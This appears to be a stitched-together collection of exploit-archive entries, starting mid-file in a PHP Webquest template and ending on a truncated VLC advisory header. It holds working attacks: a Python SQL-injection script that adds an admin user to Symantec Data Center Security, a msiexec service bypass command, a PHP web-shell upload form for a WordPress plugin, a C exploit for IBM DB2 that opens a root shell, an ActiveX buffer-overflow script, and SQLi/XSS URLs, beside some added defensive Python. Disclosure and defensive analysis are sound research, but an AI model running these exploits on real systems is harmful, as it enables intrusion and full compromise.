div.phpwebquest { font-size : 7.5pt;}
div.phpwebquest a:link { font-size : 7.5pt;}
div.phpwebquest a:hover { font-size : 7.5pt;}
div.phpwebquest a { font-size : 7.5pt;};
</style>
</head>
<body bgcolor="<? echo $campo['color_fondo_pagina'];?>">
<div align="center">
<table width="750" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_pagina'];?>">
<tr>
<td><div align="center">
<table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_texto'];?>">
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td height="50"><div valign="middle" align="center"><h1><font color="<? echo $campo['color_texto_titulo'];?>"><? echo $campo['titulo'];?></font></h1></div></td>
</tr>
<tr>
<?
if ($id_pagina==1){
    $titular=$introduccion;
}elseif($id_pagina==2){
    $titular=$tareas;
}elseif($id_pagina==3){
    $titular=$proceso;
}elseif($id_pagina==4){
    $titular=$evaluacion;
}else{
    $titular=$conclusiones;
}
?>
<td height="50" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"><font color="<? echo $campo['color_texto_tipo'];?>"><div valign="middle" align="center"><h3><? echo $titular;?></h3></div></font></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" height="139"> </td>
<td width="97%" valign="middle"><div align="left">
<table width="100%" height="134" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td>
<td width="2%"> </td>
<td width="97%"><? echo $texto_actual;?><br>
<table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>">
<?
if ($id_pagina==3){
    echo '<tr></tr>';
    $sentencia="select url, descripcion from url where id_actividad=".$id_actividad;
    $resultado=mysql_query($sentencia);
    $j=1;
    while($v=mysql_fetch_array($resultado)){
        foreach ($v as $indice=>$valor){
            if(!is_int($indice)){
                if($indice=='url'){
                    echo '<tr><td><div class="celdamenu"><a href='.$valor.' target="_blank"></div>';
                }else{
                    echo $valor."</td></tr>";
                }
                $url[$j][$indice]=$valor;
            }
        }
        $j++;
    }
}
mysql_close($c);
?>
</table>
</td>
</tr>
</table>
</div></td>
<td width="2%"> </td>
</tr>
</table></td>
<td width="15%" valign="top">
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF">
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="19">
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>
<td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
</tr>
</table>
</td>
</tr>
</table>
</div></td>
</tr>
</table>
</div>
</body>
</html>

# greetz to all my friends, balawi, ro3ob hr, mothana-X, sharingan jo, and anonymous jo, and all muslim hackers
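The root cause above is that $_GET['id_actividad'] is concatenated straight into $sentencia. As an added example (not code from PHP Webquest or from the advisory), the Python below reproduces that concatenation against a constructed stand-in for the actividad table and sets it beside a parameterized version that keeps the script's own fallback of 1500000 for an empty id:

```python
import re
import sqlite3


def make_demo_db():
    """Constructed stand-in for PHP Webquest's `actividad` table (only the columns this demo needs)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE actividad (id_actividad INTEGER PRIMARY KEY, titulo TEXT, autor TEXT);
        INSERT INTO actividad VALUES (184, 'Volcanoes', 'teacher-a');
        INSERT INTO actividad VALUES (185, 'Rivers', 'teacher-b');
        INSERT INTO actividad VALUES (1500000, 'placeholder', 'system');
    """)
    return conn


def load_actividad_vulnerable(conn, id_actividad):
    """Mirrors soporte_horizontal_w.php: the raw GET value is glued onto the statement text."""
    sentencia = "SELECT * FROM actividad WHERE id_actividad=" + id_actividad
    return conn.execute(sentencia).fetchall()


def parse_id(raw, default=1500000):
    """Keep the script's fallback (empty -> 1500000) but accept nothing except a decimal id."""
    if raw is None or raw == "":
        return default
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError(f"rejected id_actividad value: {raw!r}")
    return int(raw)


def is_rejected(raw):
    """True when parse_id refuses the value (convenience for checks and tests)."""
    try:
        parse_id(raw)
    except ValueError:
        return True
    return False


def load_actividad_safe(conn, id_actividad):
    """Hardened version: the validated integer travels as a bound parameter, never as SQL text."""
    id_value = parse_id(id_actividad)
    return conn.execute("SELECT * FROM actividad WHERE id_actividad=?", (id_value,)).fetchall()
```

The same two changes (strict integer validation plus a bound parameter) apply to the second query, the one built from $id_actividad for the pagina table.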

jclassifiedsmanager - Multiple Vulnerabilities

# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager

# PoC Exploit: SQL Injection
--------------------------------
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]

"id" parameter is not sanitized.

# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1

"view" parameter is not sanitized.

########################################
# Vulnerability Disclosure Timeline:
2014-Dec-11: Discovered vulnerability
2014-Dec-12: Vendor Notification
2014-Dec-12: Vendor Response/Feedback
2015-Jan-19: Vendor Fix/Patch
2015-Jan-26: Public Disclosure
#######################################

Symantec Data Center Security - Multiple Vulnerabilities

SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: Symantec Data Center Security: Server Advanced (SDCS:SA)
                     Symantec Critical System Protection (SCSP)
 vulnerable version: see: Vulnerable / tested versions
      fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all vulnerabilities
                     were fixed, but mitigations exist
             impact: Critical
         CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
           homepage: http://www.symantec.com
              found: 2014-09-19
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect
numerous physical and virtual server environments. Through a combination of
technologies including application-centric controls including protected white
listing, sandboxing using least privilege access controls, host-based
intrusion detection (HIDS) and prevention (HIPS), and real-time file integrity
monitoring (FIM), organizations can proactively safeguard their heterogeneous
server environments and the information they contain from zero-day and
targeted attacks, and fulfill their compliance mandates across critical
systems. Click here for more info"

Source: http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products

Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can
gain access at the system and database level. Furthermore attackers can
manage all clients and their policies. SDCS:SA Server can be used as an entry
point into the target infrastructure (lateral movement, privilege escalation).

Furthermore the SDCS:SA Client protections can be bypassed in several ways.

It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.

Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.

Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection of
direct SQL commands. By exploiting the vulnerability, an attacker gains access
(read/write) to all records stored in the database as arbitrary SQL statements
can be executed. Furthermore the application design enables an attacker to
gain code execution as SYSTEM (highest privilege Windows user) on the server
by exploiting this vulnerability.

No prior authentication is needed to exploit this vulnerability.

Affected script:
https://<host>:4443/sis-ui/authenticate

2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The application suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.

Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp

3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver and version information (OS, Java), and is accessible without prior
authentication.

Affected script:
https://<host>:8081/webui/admin/environment.jsp

4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client) (CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.

Note: SEC Consult did not check whether the mitigations provided by Symantec
do in fact sufficiently mitigate these vulnerabilities!

- Persistent code execution via Windows Services
  The default Symantec policy rules can be bypassed in order to get persistent
  arbitrary code execution.

- Remote code execution via RPC
  The default Symantec policy rules can be bypassed in order to get persistent
  arbitrary code execution. In addition to that "psexec-style" remote code
  execution via SMB is possible as well.

- Policy bypass: Extraction of Windows passwords/hashes
  The default Symantec policy rules do not prevent attackers from extracting
  the Windows passwords/password hashes from the System.

- Privilege elevation via Windows Installer (msiexec.exe)
  The restrictions imposed by the default policies can be bypassed entirely by
  exploiting incorrect assumptions made in the policy regarding the Windows
  Installer (msiexec.exe).

- Privilege elevation/code execution via Windows Management Instrumentation (.mof files)
  The restrictions imposed by default policies can be bypassed partially by
  exploiting incorrect assumptions made in the policy regarding the Windows
  Management Instrumentation. The policy does not take intended OS
  functionality to execute code into account.

Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.

In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:

  INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');

  INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);

The code used to exploit the SQL injection vulnerability is listed below:

import httplib

def send_request(host,data):
    params = data
    headers = {"AppFire-Format-Version": "1.0",
               "AppFire-Charset": "UTF-16LE",
               "Content-Type":"application/x-appfire",
               "User-Agent":"Java/1.7.0_45",
              }
    conn = httplib.HTTPSConnection(host)
    conn.request("POST", "/sis-ui/authenticate", params, headers)
    response = conn.getresponse()
    data=response.read()
    conn.close()
    return response,data

header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"

data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- " # add user to admin group

data+="\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')

eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag

response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status

As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS. The Tomcat Web Application Manager can be used to
deploy new .war-files containing attacker-controlled Java code. This allows
an attacker to execute arbitrary commands on the operating system with the
permissions/user of the "Symantec Data Center Security Server Manager"
service (SISManager) which are SYSTEM.

2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>

3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URL discloses internal information:
https://example.com:8081/webui/admin/environment.jsp

4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client) (CVE-2014-9226)

- Persistent code execution via Windows Services
  Windows Service binaries can have file extensions other than ".exe". This
  allows an attacker to execute arbitrary files and enables automatic
  execution of malicious code at OS boot.

- Remote code execution via RPC
  Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec)
  can be modified to write files not ending with ".exe" on the target system.

- Policy bypass: Extraction of Windows passwords/hashes
  The tool "mimikatz" can be used to extract Windows credentials.

- Privilege elevation via Windows Installer (msiexec.exe)
  msiexec.exe is trusted "safe privileges" when started as a service (usually
  "Windows Installer" parameter "/V"). This can be abused by creating a
  service that starts msiexec.exe with the parameters "/quiet", "/i" and a
  path to a valid .msi file. Upon service start the .msi file is executed with
  "safe privileges" privileges and not subject to any SDCS:SA Client checks.

  sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore
  net start evil_service

- Privilege elevation/code execution via Windows Management Instrumentation (.mof files)
  On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
  are automatically compiled/executed. These trigger arbitrary code execution.
  The code is executed with "def_winsvcs_ps" permissions.

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery. However other versions (SCSP 5.2.9) are affected by the
vulnerabilities as well. See the vendor information in the Solution section.

Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December, version
            containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations, target
            release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP.
2015-01-22: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues.

More information can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
http://www.symantec.com/business/support/index?page=content&id=TECH227679
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071

Workaround:
-----------
See solution.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2015
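The PoC above documents the framing the authenticate servlet expects: an ASCII header block ending in a blank line, a UTF-16LE body of "key=value" pairs whose byte length is announced in Data-Length, and a trailing EOF_FLAG. As an added example (not code from SEC Consult or Symantec) the Python below parses that framing strictly and flags "un" values that carry SQL metacharacters, which is what an inline gateway or IDS signature for this endpoint would check while the server-side fix (parameterized queries) is rolled out; the 64-character username limit, the keyword list and the benign field values in the test are constructed assumptions, not values from the advisory.

```python
import re

# Framing as used by the published PoC for /sis-ui/authenticate.
HEADER_TERMINATOR = b"\n\n"
EOF_FLAG = b"\nEOF_FLAG\n"

# Quote/comment characters and statement keywords that never belong in a username.
# A blocklist like this is a detection aid with false positives (e.g. "o'brien"), not a fix.
SQL_META = re.compile(r"['\";]|--|/\*|\b(?:insert|update|delete|union|select|drop)\b",
                      re.IGNORECASE)


def build_appfire_message(fields):
    """Frame a properties message exactly as the PoC does (used here to construct test input)."""
    body = "".join(f"{key}={value}\r\n" for key, value in fields.items()).encode("utf-16le")
    header = (f"Data-Format=text/plain\nData-Type=properties\n"
              f"Data-Length={len(body)}\n\n").encode("ascii")
    return header + body + EOF_FLAG


def parse_appfire_message(raw):
    """Return (headers, fields) for a framed message; raise ValueError on any framing mismatch."""
    head, sep, rest = raw.partition(HEADER_TERMINATOR)
    if not sep:
        raise ValueError("header block not terminated")
    headers = {}
    for line in head.split(b"\n"):
        key, _, value = line.partition(b"=")
        headers[key.decode("ascii")] = value.decode("ascii")
    if headers.get("Data-Type") != "properties":
        raise ValueError("unexpected Data-Type")
    length = int(headers.get("Data-Length", "-1"))
    if length < 0 or length % 2:
        raise ValueError("Data-Length is not a valid UTF-16LE byte count")
    body, trailer = rest[:length], rest[length:]
    if len(body) != length or trailer != EOF_FLAG:
        raise ValueError("body length or EOF_FLAG does not match the header")
    fields = {}
    for line in body.decode("utf-16le").split("\r\n"):
        if line:
            key, _, value = line.partition("=")
            fields[key] = value
    return headers, fields


def check_authenticate_request(raw, max_username_len=64):
    """Findings for one authenticate message; an empty list means nothing suspicious was seen."""
    try:
        _, fields = parse_appfire_message(raw)
    except ValueError as exc:
        return [f"malformed framing: {exc}"]
    findings = []
    username = fields.get("un", "")
    if len(username) > max_username_len:
        findings.append(f"username length {len(username)} exceeds {max_username_len}")
    match = SQL_META.search(username)
    if match:
        findings.append(f"username contains SQL metacharacter/keyword {match.group(0)!r}")
    return findings
```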
# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps

1. Description

Every registered user (even a Subscriber) can reach the upload functionality, because the "read" role is the only capability checked inside UploadHandler.php.
http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html

2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register).
Pack .php files into a .zip archive, then send it using:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>

Your files will be visible inside:
http://wordpress-install/wp-admin/rce/

3. Solution:

Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip
// source: https://www.securityfocus.com/bid/48514/info

IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Successfully exploiting this issue will result in a complete compromise of the affected system.

IBM DB2 9.7 is vulnerable; other versions may also be affected.

/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

    * Redistributions of source code must retain the above copyright
      notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright
      notice, this list of conditions and the following disclaimer in the
      documentation and/or other materials provided with the distribution.
    * Neither the name of the Nth Dimension nor the names of its
      contributors may be used to endorse or promote products derived from
      this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.

(c) Tim Brown, 2011
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

PoC exploit for IBM DB2 DT_RPATH privesc.
*/

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv) {
    FILE *badlibkbbsrchandle;
    int pwnedflag;

    printf("PoC exploit for IBM DB2 DT_RPATH privesc.\r\n");
    printf("(c) Tim Brown, 2011\r\n");
    printf("<mailto:timb@nth-dimension.org.uk>\r\n");
    printf("<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>\r\n");

    /* Write out the source of a replacement libkbb.so whose constructor runs when loaded */
    printf("Constructing bad_libkbb.so...\r\n");
    badlibkbbsrchandle = fopen("bad_libkbb.c", "w");
    if (badlibkbbsrchandle == NULL) {
        perror("fopen");
        exit(1);
    }
    fprintf(badlibkbbsrchandle, "#include <stdio.h>\r\n");
    fprintf(badlibkbbsrchandle, "#include <unistd.h>\r\n");
    fprintf(badlibkbbsrchandle, "#include <stdlib.h>\r\n");
    fprintf(badlibkbbsrchandle, "\r\n");
    fprintf(badlibkbbsrchandle, "void __attribute__ ((constructor)) bad_libkbb(void) {\r\n");
    fprintf(badlibkbbsrchandle, " printf(\"Have a root shell...\\r\\n\");\r\n");
    fprintf(badlibkbbsrchandle, " setuid(geteuid());\r\n");
    fprintf(badlibkbbsrchandle, " system(\"/usr/bin/id\");\r\n");
    fprintf(badlibkbbsrchandle, " system(\"/bin/sh\");\r\n");
    fprintf(badlibkbbsrchandle, " exit(0);\r\n");
    fprintf(badlibkbbsrchandle, "}\r\n");
    fclose(badlibkbbsrchandle);

    /* Build the library in the current directory, then run the setuid binary that picks it up via its DT_RPATH */
    system("gcc -shared -fPIC -o libkbb.so bad_libkbb.c");
    system("/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1");
    exit(0);
}

iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow

source: https://www.securityfocus.com/bid/48550/info

iMesh is prone to a buffer overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

iMesh 10.0 is vulnerable; other versions may also be affected.

<!--
###
# Title : iMesh <= 10.0 (IMWebControl.dll) Remote Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Buffer Overflow & DLL Hijacked
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3
###
-->
<?XML version='1.0' standalone='yes' ?>
<package>
<job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B97' id='target'/>
<script language='vbscript'>
'Wscript.echo typename(target)
targetFile = "C:\Program Files\iMesh Applications\iMesh\IMWebControl.dll"
prototype = "ProcessRequestEx ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )"
memberName = "ProcessRequestEx"
progid = "target.IMWebControl"
buf=String(31337, "A") ' Buffer Overflow
puf=218959117 'set ecx to 0x0d0d0d0d
target.SetHandler puf
target.ProcessRequestEx buf ,puf ' Bo0M !
</script>
</job>
</package>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
-->

Paliz Portal - Cross-Site Scripting / Multiple SQL Injections

source: https://www.securityfocus.com/bid/48559/info

Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch
http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli]
http://www.example.com/[Path]/Default.aspx?tabid=[Sqli]

eTAWASOL - 'id' SQL Injection

source: https://www.securityfocus.com/bid/48561/info

eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/npages/back.asp?id=[SQL]

VideoLAN VLC Media Player 2.1.5 - DEP Access Violation

Title : VLC Player 2.1.5 DEP Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
